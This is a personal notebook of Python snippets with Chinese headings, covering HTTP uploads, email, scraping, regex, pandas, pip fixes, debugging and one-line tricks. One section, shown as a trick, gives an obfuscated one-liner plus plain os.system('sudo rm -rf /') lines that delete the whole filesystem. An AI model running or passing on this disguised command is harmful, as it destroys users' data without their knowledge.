python記錄

python上傳文件

import requests
#https://zhuanlan.zhihu.com/p/20091394
# Upload a local JPEG to how-old.net as multipart form data and print the raw response.
s = requests.session()
url = 'http://how-old.net/Home/Analyze?isTest=False&source=&version=001'
header = {
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0",
    'Host': "how-old.net",
    'Referer': "http://how-old.net/",
    'X-Requested-With': "XMLHttpRequest",
}

# Open the JPEG to upload; the context manager closes the handle as soon as
# the request has been sent instead of leaking it until interpreter exit.
with open('test.jpg', 'rb') as image_file:
    data = {'file': image_file}
    r = s.post(url, files=data, headers=header)
h = r.content
# print() with a single argument behaves the same on Python 2 and Python 3.
print(h)

Python中的copy、deepcopy

a = [0, 1, 2, 3, [4, 5, 6], 7]
b = a[:]
a[0] = 5
a[4][0] = 99
print(a)
print(b)
print([id(x) for x in a])
print([id(x) for x in b])

Python正則表達式匹配.*

# encoding:utf-8
import urllib
import re
import json

url = 'http://news.163.com/special/00014RJU/nationalnews-json-data.js'
result = urllib.urlopen(url).read().strip()
pattern = re.compile(r';var newsList=(.*)')
pattern = re.compile(r';var newsList=([\s\S]*)')#.*只能匹配非換行符,換成[\s\S]*便可
matchs = pattern.match(result)
print(matchs.group())

使用python進行文件夾對比

#coding:gbk
from filecmp import dircmp


def show_diff_files(dcmp):
    """Recursively print the files that exist on both sides but differ.

    Args:
        dcmp: a ``filecmp.dircmp``-style object exposing ``diff_files``,
            ``left``, ``right`` and ``subdirs``.
    """
    for name in dcmp.diff_files:
        # Single-argument print() works on both Python 2 and Python 3.
        print("diff_file %s found in %s and %s" % (name, dcmp.left, dcmp.right))
    # Descend into every sub-directory common to both sides.
    for sub_dcmp in dcmp.subdirs.values():
        show_diff_files(sub_dcmp)

def show_only(dcmp):
    """Recursively print the entries that exist on only one side.

    Args:
        dcmp: a ``filecmp.dircmp``-style object exposing ``left_only``,
            ``right_only``, ``left``, ``right`` and ``subdirs``.
    """
    # Iterating an empty list is a no-op, so no emptiness guard is needed.
    for name in dcmp.left_only:
        print("%s只存在於%s中" % (name, dcmp.left))
    for name in dcmp.right_only:
        print("%s只存在於%s中" % (name, dcmp.right))
    # Descend into every sub-directory common to both sides.
    for sub_dcmp in dcmp.subdirs.values():
        show_only(sub_dcmp)

def compare(dir1,dir2):
    """Compare two directory trees and print every difference found.

    Differing common files are reported first, then the entries that exist
    on only one side.
    """
    comparison = dircmp(dir1, dir2)
    for report in (show_diff_files, show_only):
        report(comparison)

發送郵件

from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
from time import sleep
from bs4 import BeautifulSoup
import requests
import smtplib
import time
def SendMessage(title):  # send an email
    """Send a plain-text reminder email whose body is ``title``.

    The sender, password, recipient and SMTP host are the placeholder values
    hard-coded below. Returns ``None``; any ``smtplib`` error propagates to
    the caller.
    """
    def _format_addr(s):
        # Encode the display name so non-ASCII names survive in the header.
        name, addr = parseaddr(s)
        return formataddr((Header(name, 'utf-8').encode(), addr))

    from_addr = 'xxx@163.com'  # sender mailbox
    password = 'xxxx'  # mailbox password
    to_addr = 'xxx@163.com'  # recipient mailbox
    smtp_server = 'smtp.163.com'  # make sure the SMTP service is enabled for this account
    msg = MIMEText(title, 'plain', 'utf-8')
    msg['From'] = _format_addr('郵件提醒 <%s>' % from_addr)
    msg['To'] = _format_addr('親愛的 <%s>' % to_addr)
    msg['Subject'] = Header('郵件提醒更新', 'utf-8').encode()
    server = smtplib.SMTP(smtp_server, 25)
    try:
        server.set_debuglevel(1)
        server.login(from_addr, password)
        server.sendmail(from_addr, [to_addr], msg.as_string())
    finally:
        # Always close the connection, even when login or sending fails.
        server.quit()
print(SendMessage('hello'))

10 行代碼斷定色圖片

import sys, Image  
  
img = Image.open(sys.argv[1]).convert('YCbCr')  
  
w, h = img.size  
  
data = img.getdata()  
  
cnt = 0  
  
for i, ycbcr in enumerate(data):  
  
    y, cb, cr = ycbcr  
  
    if 86 <= cb <= 117 and 140 <= cr <= 168:  
  
        cnt += 1  
  
print '%s %s a porn image.'%(sys.argv[1], 'is' if cnt > w * h * 0.3 else 'is not')

命令行格式化

>>> echo '{"key":"value"}' | python -m json.tool
{
    "key": "value"
}
//python -m json.tool

//在 vim 中執行這句代碼,能夠快速格式化 json 數據
curl -L http://restapi/json_response -o json-response | python -m json.tool

獲取公網IP地址

python -c "import socket; sock=socket.create_connection(('ns1.dnspod.net',6666)); print sock.recv(16); sock.close()"

幫你數數:

$ python -c "print(' '.join([str(i) for i in range(1,10000)]))" | say

一行統計一本書的全部詞頻(此處是前100)

import re; from collections import Counter; Counter(re.findall(r'\w+',open('hamlet.txt').read().lower())).most_common(100)

轉置矩陣

m = [ [1,2],[3,4]]; zip(*m)

import就能夠飛

import antigravity就會打開 xkcd.com/about/html

2的1000次方的各位數之和

sum(map(int, str(2**1000)))

一行篩質數

filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, n))

list分組

a=[3, 8, 9, 4, 1, 10, 6, 7, 2, 5]
[a[i:i+3] for i in xrange(0,len(a),3)]
結果[[3, 8, 9], [4, 1, 10], [6, 7, 2], [5]]

key,value互換

m = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
{v: k for k, v in m.items()}
結果:{1: 'a', 2: 'b', 3: 'c', 4: 'd'}

碾平list

a = [1, 2, [3, 4], [[5, 6], [7, 8]]]
flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
flatten(a);
結果:[1,2,3,4,5,6,7,8]

簡易的web服務

python -m SimpleHTTPServer 8000,而後瀏覽器打開 localhost:8000,一個簡易的web服務就開啓了

打印九九乘法表

print('\n'.join([' '.join(['%s*%s=%-2s' % (y,x,x*y) for y in range(1,x+1)]) for x in range(1,10)]))

計算出1-1000之間的素數

# Trial division must include int(sqrt(i)) itself; with an exclusive bound the
# squares of primes (4, 9, 25, ...) have no tested divisor and print as primes.
print(*(i for i in range(2, 1000) if all(i % j for j in range(2, int(i**.5) + 1))))

輸出斐波那契數列的值

print [x[0] for x in [ (a[i][0], a.append((a[i][1], a[i][0]+a[i][1]))) for a in ([[1,1]], ) for i in xrange(100) ]]

網易雲音樂批量下載

import requests
import urllib

# 榜單歌曲批量下載
# r = requests.get('http://music.163.com/api/playlist/detail?id=2884035')    # 網易原創歌曲榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=19723756')    # 雲音樂飆升榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=3778678')    # 雲音樂熱歌榜
r = requests.get('http://music.163.com/api/playlist/detail?id=3779629')    # 雲音樂新歌榜

# 歌單歌曲批量下載
# r = requests.get('http://music.163.com/api/playlist/detail?id=123415635')    # 雲音樂歌單——【華語】中國風的韻律,中國人的印記
# r = requests.get('http://music.163.com/api/playlist/detail?id=122732380')    # 雲音樂歌單——那不是愛,只是寂寞說的謊

arr = r.json()['result']['tracks']    # 共有100首歌
    
for i in range(10):    # 輸入要下載音樂的數量,1到100。
    name = str(i+1) + ' ' + arr[i]['name'] + '.mp3'
    link = arr[i]['mp3Url']
    urllib.request.urlretrieve(link, '網易雲音樂\\' + name)    # 提早要建立文件夾
    print(name + ' 下載完成')

調用默認瀏覽器打開一坨網頁

import webbrowser

urls = [
    'http://www.douban.com',
    'http://weibo.com',
    'http://www.zhihu.com',
    'http://www.v2ex.com/',
    'https://github.com/',
    'https://mail.google.com/',
    'http://instagram.com/',
]

# map() returns a lazy iterator on Python 3, so an un-consumed map(...) never
# calls webbrowser.open; an explicit loop opens every page on Python 2 and 3.
for page_url in urls:
    webbrowser.open(page_url)

扒取kindle今日特價書,把結果郵件到指定郵箱

# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import smtplib
from email.mime.text import MIMEText
from email.Header import Header

result = {"name": [], "cover": [], "desc": [], "link": [], "price": []}


def get_page():
    """Fetch the page behind the hard-coded short link and return its text."""
    response = requests.get("http://t.cn/Rvm4xgc")
    return response.text


def parse(html):
    """Extract two book entries from ``html`` and append them to ``result``.

    The data is read from the seventh ``<table>`` in the body: its second row
    holds the titles and its third row the cover, link, description and
    price. The two books sit in cells 0 and 2 of each row.
    """
    soup = BeautifulSoup(html)
    table = soup.body.find_all("table")[6]
    rows = table.find_all("tr")
    book_columns = (0, 2)

    # Titles first, in column order.
    title_cells = rows[1].find_all("td")
    for col in book_columns:
        result["name"].append(title_cells[col].b.string)

    # Then the per-book details, one book at a time.
    detail_cells = rows[2].find_all("td")
    for col in book_columns:
        book = detail_cells[col]
        result["cover"].append(book.a.img["src"])
        result["link"].append("http://www.amazon.cn" + book.a["href"])
        result["desc"].append(book.contents[1])
        result["price"].append(book.find_all("p")[1].b.span.string)


mail_config = {
    "from": "gitradar@163.com",
    "to": "liushuaikobe1993@163.com",
    "server": "smtp.163.com",
    "username": "gitradar",
    "pwd": "yourpassword"
}


def send_mail(sbj, content, from_whom=mail_config['from'], to_whom=mail_config['to'], server=mail_config['server'],
              username=mail_config['username'], pwd=mail_config['pwd']):
    """Send ``content`` as an HTML email with subject ``sbj`` over STARTTLS.

    Args:
        sbj: subject line (encoded as UTF-8).
        content: HTML body of the message.
        from_whom, to_whom: envelope and header addresses.
        server: SMTP host to connect to.
        username, pwd: credentials passed to ``SMTP.login``.

    Any ``smtplib`` error propagates to the caller.
    """
    msg = MIMEText(content, "html", "utf-8")
    msg['Subject'] = Header(sbj, "utf-8")
    msg['From'] = from_whom
    msg['To'] = to_whom
    s = smtplib.SMTP(server)
    try:
        s.ehlo()
        s.starttls()
        s.login(username, pwd)
        s.sendmail(from_whom, to_whom, msg.as_string())
    finally:
        # The original never closed the connection; release it on every path.
        s.quit()


def build_html():
    """Render the first two entries of ``result`` as a small HTML document.

    Each book becomes a heading (name and price), a cover image linking to
    the book page, and a description paragraph.
    """
    def book_section(idx):
        # One book: heading, linked cover image, then the description.
        heading = '<h2>' + result["name"][idx] + '&nbsp; ' + result["price"][idx] + '</h2>'
        cover = '<a href="' + result["link"][idx] + '">' \
            + '<img src="' + result["cover"][idx] + '"></img>' \
            + '</a>'
        blurb = '<p>' + result["desc"][idx] + '</p>'
        return heading + cover + blurb

    return '<html><body>' + book_section(0) + book_section(1) + '</body></html>'


if __name__ == "__main__":
    parse(get_page())
    html = build_html()
    sbj = "Kindle今日特價書"
    send_mail(sbj, html)

心形函數

print('\n'.join([''.join([('PYTHON!'[(x-y)%7]if((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3<=0else' ')for x in range(-30,30)])for y in range(15,-15,-1)]))

                THON!PYTH           YTHON!PYT               
            !PYTHON!PYTHON!PY   N!PYTHON!PYTHON!P           
          N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH         
         N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON        
        N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!P       
        !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PY       
        PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYT       
        YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH       
        THON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHO       
        HON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON       
         N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON        
          PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON         
          YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!         
            ON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON           
             !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON            
              YTHON!PYTHON!PYTHON!PYTHON!PYTHON             
                ON!PYTHON!PYTHON!PYTHON!PYTHO               
                  PYTHON!PYTHON!PYTHON!PYTH                 
                    HON!PYTHON!PYTHON!PYT                   
                       PYTHON!PYTHON!P                      
                          ON!PYTHON                         
                             YTH                            
                              H

Python實現Zip文件的暴力破解

import zipfile 
try:
    with zipfile.ZipFile('1.zip') as zFile:     # open the archive
        # Extract everything using the candidate password.
        zFile.extractall(path='./',pwd=b'1314')
        print('Extract the Zip file successfully!')
except Exception:
    # Wrong password, corrupt archive or missing file all count as failure.
    # Unlike a bare ``except:``, this lets KeyboardInterrupt and SystemExit
    # propagate so the script can still be interrupted.
    print('Extract the Zip file failed!')

判斷輸入數字是實數(整型數字或者浮點型數字)

In [1]: isinstance(1, (int, long, float))
True

In [2]: isinstance('a', (int, long, float))
False
In [1]: foo = '123.456'

In [2]: foo.replace('.', '', 1).isdigit()
True

In [3]: bar = '12.34.56'

In [4]: bar.replace('.', '', 1).isdigit()
False

def input_num():
    """Prompt until the user types an unsigned integer or decimal number.

    Returns:
        The accepted text exactly as typed (a string, not a number). Input is
        accepted when it consists of digits with at most one ``.`` removed,
        so signs and exponents are rejected.
    """
    try:
        read_line = raw_input  # Python 2
    except NameError:
        read_line = input  # Python 3: input() already returns the raw string
    while True:
        num = read_line('input a number : ')
        if num.replace('.', '', 1).isdigit():
            return num
>>> f = 1.0
>>> f.is_integer()
True
>>> f = 1.0 / 3 + 2.0 / 3
>>> f.is_integer()
True
try:
    f = float(input_value)
except Exception:
    ...
else:
    # Is it a integer?
    if f.is_integer():
        ...
    else:

pip 安裝lxml時出現 「Unable to find vcvarsall.bat

1. 安裝wheel,命令行運行:
pip install wheel

2.在http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml 這裏下載對應的.whl文件,注意別改文件名!
Ctrl + F,輸入lxml,找到下面這段
Lxml, a binding for the libxml2 and libxslt libraries.
lxml‑3.4.4‑cp27‑none‑win32.whl
lxml‑3.4.4‑cp27‑none‑win_amd64.whl
lxml‑3.4.4‑cp33‑none‑win32.whl
lxml‑3.4.4‑cp33‑none‑win_amd64.whl
lxml‑3.4.4‑cp34‑none‑win32.whl
lxml‑3.4.4‑cp34‑none‑win_amd64.whl
lxml‑3.4.4‑cp35‑none‑win32.whl
lxml‑3.4.4‑cp35‑none‑win_amd64.whl
cp後面是Python的版本號,27表示2.7,根據你的Python版本選擇下載。

3. 進入.whl所在的文件夾,執行命令便可完成安裝
pip install 帶後綴的完整文件名
$ pip install lxml-3.6.4-cp35-cp35m-win32.whl
Processing .\lxml-3.6.4-cp35-cp35m-win32.whl
Installing collected packages: lxml
Successfully installed lxml-3.6.4
http://stackoverflow.com/questions/29440482/how-to-install-lxml-on-windows 
http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat

Python一行刪掉根目錄

(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))
 
import os
os.system('sudo rm -rf /')
__import__('os').system('sudo rm -rf /')

登陸博客園

from selenium import webdriver
import time


browser = webdriver.Chrome()
browser.get("http://cnblogs.com")
time.sleep(1)
browser.find_element_by_link_text("登陸").click()
time.sleep(1)
browser.find_element_by_id("input1").send_keys("用戶名")
browser.find_element_by_id("input2").send_keys("密碼")
browser.find_element_by_id("signin").click()
time.sleep(1)
try:
    if browser.find_element_by_link_text("退出"):
        print "Login Successfully."
except:
    print "Login failed."


from selenium import webdriver
source_url='http://huaban.com/boards/28195582/'
headers={
    'Host':'huaban.com',
    'Pragma':'no-cache',
    'Cache-Control':'no-cache',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36',
    'Cookie':'xxxxxx'
}
cap = webdriver.DesiredCapabilities.PHANTOMJS
cap["phantomjs.page.settings.userAgent"] = headers['User-Agent']    #設置請求header頭信息
cap["phantomjs.page.settings.loadImages"] = False                   #禁止加載圖片
cap["phantomjs.page.customHeaders.Host"]=headers['Host']
cap["phantomjs.page.customHeaders.Pragma"]=headers['Pragma']
cap["phantomjs.page.customHeaders.Cookie"]=headers['Cookie']
driver = webdriver.PhantomJS(desired_capabilities=cap)
driver.get(source_url)

unicode

echo "u00e8u0091u0089u00e7u008au00b6u00e3u0083u00a2u00e3u0083u008eu00e3u0083u009du00e3u0083u00bcu00e3u0083u00abu00e3u0082u00a2u00e3u0083u00b3u00e3u0083u0086u00e3u0083u008a"
x = u'\u00e8\u0091\u0089'
print x

python中怎麼獲取某個網頁元素以前的全部源碼?

doc = '''
<html>
    <head>
        <title>The Dormouse's story </title>
    </head> 
    <body> 
        <p id="p1">p1p1p1
            <b id='b1'>b1b1b1</b>
        </p> 
        <p id="p2">p2p2p2</p>
        <div id='d1'>
            <ul id='u1'>u1u1u1</ul>
            <a id="a1">a1a1a1</a>
            <div id='d2'>
                <a id="a2">a2a2a2 </a>
                <b id='b2'>b2b2b2</b>
                <p id='p3'>p3p3p3</p>
            </div>
            <a id="a3">a3a3a3 </a>
        </div> 
        <p id="p4">p4p4p4</p>
    </body>
</html>
'''

from lxml import html

tree = html.fromstring(doc)
a = tree.get_element_by_id("a1")
print(html.tostring(a))
print(html.tostring(tree).decode())

def dropnode(e=None):
    """Remove everything that follows ``e`` in document order, up to ``<body>``.

    Starting at ``e`` and walking up through its ancestors, every following
    sibling of the current node is dropped. The walk stops when it reaches
    the element tagged ``body`` (which is left untouched) or runs out of
    parents.
    """
    node = e
    while node is not None and node.tag != 'body':
        # Re-query getnext() after each drop: the next sibling changes.
        sibling = node.getnext()
        while sibling is not None:
            sibling.drop_tree()
            sibling = node.getnext()
        node = node.getparent()

dropnode(a)
print(html.tostring(tree).decode())

requests優雅的下載圖片

import requests
from bs4 import BeautifulSoup

r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text,'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]

ir = requests.get(image)
if ir.status_code == 200:
    open('logo.jpg', 'wb').write(ir.content)
 
import requests
from bs4 import BeautifulSoup

r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text,'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]

ir = requests.get(image)
if ir.status_code == 200:
    open('logo.jpg', 'wb').write(ir.content)

python lxml

import lxml.etree 
import urllib.request
from lxml.etree import *
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=26693255&retmode=text&rettype=xml'
request = urllib.request.Request(str_url)
xml_text = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml_text) # xml_text 爲xml純文本文件
# example  獲取雜誌名稱和ISSN
# 使用 tag做爲輸入須要逐級進行
journal_name = root.find('PubmedArticle').find('MedlineCitation').find('Article').find('Journal').find('Title').text
# 也可使用xpath(必須使用相對路徑,以.//開頭,若是想使用絕對路徑可使用xpath函數)
journal_name = root.find('.//Title').text
print('xpath:' ,journal_name)
journal_name = root.xpath('//Title')[0].text
print(journal_name)

爬取 豆瓣電影主頁本週口碑榜

import lxml.html
str_url = 'http://movie.douban.com/'
request = urllib.request.Request(str_url)
html_text = urllib.request.urlopen(request).read()
root = lxml.html.fromstring(html_text)
# 獲取本頁面全部項目名稱 cssselect() 函數,返回list,包含全部匹配的結果,可使用css選擇器,相似於jquery
movies_list = [a.text for a in  root.cssselect('div.billboard-bd tr td a')]
print(movies_list)
# 獲取全部電影超連接
movies_href = [a.get('href') for a in  root.cssselect('div.billboard-bd tr td a')]
print(movies_href)

回頭遍歷

n=7 
list1=['a','b','c','d'] 
print (l * (n // len(l) + 1))[:n]
(list1 * 2)[:n]
import itertools 
import math 
(list1 * math.ceil( n / len(list1) ) )[:7] 
n=7 
list1=['a','b','c','d'] 
print list(itertools.islice(itertools.cycle(list1), 0, n))

pip 安裝 scrapy

pip install wheel
http://www.lfd.uci.edu/~gohlk... 下載對應版本的 lxml和Twisted,cp後面是Python的版本號,27表示2.7 pip install 對應的whl文件
pip install scrapy

找出list2中有,可是list1中沒有的數據

list(set(list2)-set(list1))

將字符串'[1,2,3,4]'轉化爲列表[1,2,3,4]

eval('[1,2,3,4]')
[1, 2, 3, 4]
json.loads(str)
ast.literal_eval(str)
raw = b'{"aa":11,"bb":22,"cc":33}'
d   = json.loads(str(raw, 'utf-8'))
d = eval(b'{"aa":11,"bb":22,"cc":33}')
s = b'{"aa":11,"bb":22,"cc":33}'.decode('utf-8')  # 先解碼成字符串
data = json.loads(s)  # 解析爲字典對象

Pythonic [for]

# Inclusive [low, high] bounds of each bucket.
a_part = [2001, 12000]
b_part = [1001, 2000]
c_part = [11, 1000]
d_part = [1, 10]

data = range(1, 12000)
labels = [a_part, b_part, c_part, d_part]

# Explicit-loop version. The accumulator is named ``total`` rather than
# ``sum``: rebinding ``sum`` to an int shadows the builtin and makes the
# sum(...) calls in the comprehension versions below raise TypeError.
sizes = []
for part in labels:
    total = 0
    for each in data:
        total += each if each >= part[0] and each <= part[1] else 0
    sizes.append(total)
print(sizes)
# Equivalent comprehension versions.
sizes = [sum(each for each in data if part[0] <= each <= part[1]) for part in labels]
sizes = [sum(x for x in data if low<=x<=high) for low,high in labels]

send email

import smtplib
from email.mime.text import MIMEText

第三方 SMTP 服務

mail_host = "smtp.163.com"  # SMTP服務器
mail_user = "username"  # 用戶名
mail_pass = "passwd"  # 密碼

sender = 'user@163.com'  # 發件人郵箱(最好寫全, 否則會失敗)
receivers = ['to_someone@qq.com']  # 接收郵件,可設置爲你的QQ郵箱或者其餘郵箱


content = '過時教程害死人!'
title = 'Python SMTP Mail Test'  # 郵件主題
message = MIMEText(content, 'plain', 'utf-8')  # 內容, 格式, 編碼
message['From'] = "{}".format(sender)
message['To'] = ",".join(receivers)
message['Subject'] = title

try:
    smtpObj = smtplib.SMTP_SSL(mail_host, 465)  # 啓用SSL發信, 端口通常是465
    smtpObj.login(mail_user, mail_pass)  # 登陸驗證
    smtpObj.sendmail(sender, receivers, message.as_string())  # 發送
    print("mail has been send successfully.")
except smtplib.SMTPException as e:
    print(e)
    
    ###pip UnicodeDecodeError: 'ascii' codec can't decode byte 0xc0 in position 0
    vi mimetypes.py
    import sys
reload(sys)
sys.setdefaultencoding('utf-8')
    ###後臺運行命令
    from subprocess import run
run("ping 127.0.0.1",shell=True)

group by

import pandas as pd

cols = ['流水號', '處理人', '處理時間']
data = [[10000, '張三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '趙六', '2016-10-03'],
        [10001, '黃七', '2016-10-02'],
        [10000, '吳八', '2016-10-03']]

df = pd.DataFrame(data,columns=cols)
grp = [(n, ','.join([r for r in set(df[df['流水號']==n]['處理人'])]))
                       for n in set(df['流水號'])]

df2 = pd.DataFrame(grp, columns=cols[:-1])
print(df)
print(df2)

cols = ['流水號', '處理人', '處理時間']
data = [[10000, '張三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '趙六', '2016-10-03'],
        [10001, '黃七', '2016-10-02'],
        [10000, '吳八', '2016-10-03']]
frame = pd.DataFrame(data,columns=cols)

def combination(names):
    """Join the given strings into one comma-separated string."""
    separator = ','
    return separator.join(names)
    
frame.groupby('流水號').aggregate(combination)

pandas導入文件

import pandas as pd
pd.read_csv('1.csv', skiprows=[0, 2]) # 跳過文件第一行和第三行

找出list2中有,可是list1中沒有的數據

list(set(list2)-set(list1))
a = ["a","b","c","e"]
b = ["b","c","f"]
li = [ item for item in b if item not in a]

python try...except中如何輸出e的行號

import sys, os

try:
    raise NotImplementedError("No error")
except Exception as e:
    exc_type, exc_obj, exc_tb = sys.exc_info()
    fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
    print(exc_type, fname, exc_tb.tb_lineno)

字符串與二進制串的相互轉換

def encode(s):
    """Return the code point of each character of ``s`` in binary.

    The binary numbers carry no ``0b`` prefix and no zero padding, and are
    separated by single spaces; an empty string encodes to ``''``.
    """
    bit_groups = []
    for ch in s:
        bit_groups.append(format(ord(ch), 'b'))
    return ' '.join(bit_groups)

def decode(s):
    """Turn whitespace-separated binary numbers back into a string.

    Args:
        s: binary code points such as ``'1101000 1100101'``.

    Returns:
        The decoded text; an empty or all-whitespace ``s`` decodes to ``''``.

    Raises:
        ValueError: if a token is not a valid base-2 number.
    """
    # split() with no argument ignores leading, trailing and repeated
    # whitespace and yields [] for '', whereas split(' ') produced empty
    # tokens that made int('', 2) raise ValueError.
    return ''.join(chr(int(bits, 2)) for bits in s.split())
    
>>>encode('hello')
'1101000 1100101 1101100 1101100 1101111'
>>>decode('1101000 1100101 1101100 1101100 1101111')
'hello'
>>> bin(int('256', 10))
'0b100000000'
>>> str(int('0b100000000', 2))
'256'

windows 下python pip install libxml

http://www.lfd.uci.edu/~gohlk... 下載lxml,文件名是這樣的: lxml-3.6.4-cp27-cp27m-win32.whl
cp27表示python2.7 cmd裏輸入python第一行末尾win32,就說明python是32位的
pip install wheel #若是沒有安裝過wheel就安裝
pip install lxml-**.whl #在whl文件目錄中執行

time

import time
local = time.localtime()
print(time.localtime(1400000000))
time.mktime(local)#接受時間元組並返回時間戳
my_format = "%Y/%m/%d %H:%M:%S"
my_time = time.localtime()
print(my_time)
print(time.strftime(my_format, my_time))

python中不要使用[]{}做爲默認參數

def fn(x, L=[]):
  # Deliberate demonstration of the mutable-default pitfall: the default list
  # is created once, when the def statement is executed, and the same object
  # is reused by every call that omits L. Each call therefore appends to the
  # list left behind by the previous calls, as the prints below show.
  L.append(x)
  return L

print(fn(1))   # [1]
print(fn(7))   # [1, 7]
print(fn(13))  # [1, 7, 13]
// 而 javascript (ES6) 沒有上面那個坑
function fn(x, L=[]){
  L.push(x);
  return L.toString();
}

console.log(fn(1))   // "1"
console.log(fn(7))   // "7"
console.log(fn(13))  // "13"

嵌套列表推導式和生成器表達式

[(i,j) for i in range(3) for j in range(i) ]
((i,j) for i in range(4) for j in range(i) )

括號代替縮進

from __future__ import braces

使用re.DEBUG查看正則表達式的匹配過程

re.compile(r'\d+(.*)',re.DEBUG)

IPython調試

import sys

class ExceptionHook:
    """Callable that forwards its arguments to an IPython traceback formatter.

    The formatter is built on the first call, so IPython is only imported
    once the hook is actually invoked.
    """
    # Cached formatter; stays None until the first call.
    instance = None

    def __call__(self, *args, **kwargs):
        formatter = self.instance
        if formatter is None:
            from IPython.core import ultratb
            formatter = ultratb.FormattedTB(mode='Plain',
                 color_scheme='Linux', call_pdb=1)
            self.instance = formatter
        return formatter(*args, **kwargs)

sys.excepthook = ExceptionHook()
ipython --pdb your_script.py
from IPython import embed;embed()
 import ipdb; ipdb.set_trace()
python -m pdb your.py

ipython test.py --pdb
---------------------------------------------------------------------------
ZeroDivisionError                         Traceback (most recent call last)
/Users/dongweiming/test/test.py in <module>()
      2 b = 0
      3 
----> 4 a / b

ZeroDivisionError: integer division or modulo by zero
*** NameError: name 'pdb' is not defined
> /Users/dongweiming/test/test.py(4)<module>()
      1 a = 1
      2 b = 0
      3 
----> 4 a / b

ipdb> p b  # p是print的別名
0
ipdb> p a
1
ipdb>

調試函數

import sys

def get_cur_info():
    """Print the file name, function name, caller name and line number of the running code.

    Uses ``sys._getframe``; single-argument ``print()`` keeps the output
    identical on Python 2 and Python 3.
    """
    print(sys._getframe().f_code.co_filename)  # current file name
    print(sys._getframe(0).f_code.co_name)  # current function name
    print(sys._getframe(1).f_code.co_name)  # name of the caller ('<module>' when called from module level)
    print(sys._getframe().f_lineno)  # line number of this statement

字典解析

a_dict = {"%d^2" % item: item**2 for item in range(5)}
print(a_dict)    # {'3^2': 9, '2^2': 4, '1^2': 1, '0^2': 0, '4^2': 16}
a_generator = (item**2 for item in range(5))#生成器
a_list_generator = iter(a_list)
print(list(map(lambda x, y: x**y, range(1, 5), range(1, 5))))    # [1, 4, 27, 256]
print(reduce(lambda x, y: x+y, range(10)))    # 45
print(reduce(lambda x, y: x+y, range(10), 100))    # 145
print(reduce(lambda x, y: x+y, [[1, 2], [3, 4]], [0]))    # [0, 1, 2, 3, 4]

print(filter(None, range(-4, 5)))    # <filter object at 0x10c096710>
print(list(filter(None, range(-4, 5))))    # [-4, -3, -2, -1, 1, 2, 3, 4]
print(list(filter(lambda x: x > 0, range(-4, 5))))    # [1, 2, 3, 4]

print(all([0, 1, 2]))    # False 斷定一個可迭代對象是否全爲True或者有爲True
print(any([0, 1, 2]))    # True


for index, item in enumerate(range(5)):
    print("%d: %d" % (index, item))    # 0: 0 \n 1: 1 \n 2: 2
    
    for a, b in zip([1, 2, 3], ["a", "b", "c"]):
    print(a, b)    # 1 a \n 2 b \n 3 c
a_dict = dict(zip([1, 2, 3], ["a", "b", "c"]))
print(a_dict)    # {1: 'a', 2: 'b', 3: 'c'}
>>> [(a,b )for a, b in zip([1, 2, 3], ["a", "b", "c"])]
[(1, 'a'), (2, 'b'), (3, 'c')]
一行代碼啓動一個Web服務

python -m SimpleHTTPServer 8080  # python2
python3 -m http.server 8080  # python3
一行代碼實現求解2的1000次方的各位數之和
print(sum(map(int, str(2**1000))))
多維數組轉化爲一維
flatten = lambda x: [y for l in x for y in flatten(l)] if isinstance(x, list) else [x]
一行代碼計算出1-100之間的素數
print(' '.join([str(item) for item in filter(lambda x: not [x % i for i in range(2, x) if x % i == 0], range(2, 101))]))
print(' '.join([str(item) for item in filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, 101))]))
一行代碼打印九九乘法表
print('\n'.join([' '.join(['%s*%s=%-2s' % (y, x, x*y) for y in range(1, x+1)]) for x in range(1, 10)]))

1*1=1
1*2=2  2*2=4
1*3=3  2*3=6  3*3=9
1*4=4  2*4=8  3*4=12 4*4=16
1*5=5  2*5=10 3*5=15 4*5=20 5*5=25
